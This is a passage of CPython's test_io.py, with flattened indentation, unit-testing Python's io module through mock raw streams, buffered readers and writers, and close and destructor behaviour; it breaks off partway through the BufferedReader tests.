test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
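# --- Illustrative sketch (not part of the original test file) ---------------
# A minimal example of the base-test pattern described above, using the
# hypothetical names ExampleBytesIOTest / CExampleBytesIOTest /
# PyExampleBytesIOTest: the base class reaches the implementation under test
# through an attribute, and one thin subclass per implementation binds it.
import unittest as _example_unittest
import io as _example_c_io       # C implementation of io
import _pyio as _example_py_io   # Python implementation of io
class ExampleBytesIOTest(_example_unittest.TestCase):
    BytesIO = None  # bound by the subclasses below
    def test_roundtrip(self):
        if self.BytesIO is None:
            self.skipTest("base class is not parameterised")
        buf = self.BytesIO()
        buf.write(b"data")
        self.assertEqual(buf.getvalue(), b"data")
class CExampleBytesIOTest(ExampleBytesIOTest):
    BytesIO = _example_c_io.BytesIO
class PyExampleBytesIOTest(ExampleBytesIOTest):
    BytesIO = _example_py_io.BytesIO
# -----------------------------------------------------------------------------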
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import assert_python_ok, run_python_until_end
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
if test is pipe_writer and not threading:
continue # Skip subtest that uses a background thread
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
        # On Windows and Mac OS X this test consumes large resources; it takes
        # a long time to build the >2 GB file and takes >2 GB of disk space,
        # therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(support.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default RawIOBase.read() implementation (which calls
# readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
class PathLike:
def __init__(self, path):
self.path = path
def __fspath__(self):
return self.path
def check_path_succeeds(path):
with self.open(path, "w") as f:
f.write("egg\n")
with self.open(path, "r") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(PathLike(support.TESTFN))
check_path_succeeds(PathLike(support.TESTFN.encode('utf-8')))
bad_path = PathLike(TypeError)
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(PathLike(support.TESTFN), 'rwxa')
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
    def test_buffer_freeing(self):
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
